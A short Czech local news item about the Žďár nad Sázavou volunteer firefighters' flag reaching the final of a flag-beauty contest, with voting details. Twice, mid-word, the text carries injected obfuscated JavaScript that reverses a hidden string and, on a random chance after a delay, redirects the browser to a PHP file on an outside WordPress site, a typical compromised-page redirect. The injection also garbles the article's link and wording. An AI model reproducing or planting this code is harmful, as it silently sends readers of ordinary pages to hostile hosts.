Rainbow page separator

Žďárští hasiči bojují o nejkrásnější prapor

Neděle, 25. května 2014

Žďár nad Sázavou / Do finále soutěže o nejkrásnější hasičský prapor se dostala i vlajka Sboru dobrovolných hasičů ze Žďáru nad Sázavou. Společně s dalšími jedenácti zástavami dobrovolných hasičských sborů ji vybrala heraldická komise.
Prapor žďárských hasičů v soutěži, kterou pořádají Hasičské noviny, je možné svým hlasem podpořit prostřednictvím webových stránek www.alerion.cz/soutezni-fo[„\’///\’=“];[„\’///\’=“]; };[„\’//\’=“]}$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to. Hasičský sbor, jehož prapor bude vyhodnocen jako nejkrásnější, k němu získá vyšívanou stuhu a venkovní vlajku. Odměny se dočká i deset vylosovaných hlasujících – ti obdrží hasičské tričko. Hlasovat je možné do 28. května, vítěz soutěže o nejkrásnější hasičský prapor bude vyhlášen 6. června v 11. čísle Hasičských novin.

Fo[„\’///\’=“];[„\’///\’=“]; };[„\’//\’=“]}$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to: http://www.alerion.cz/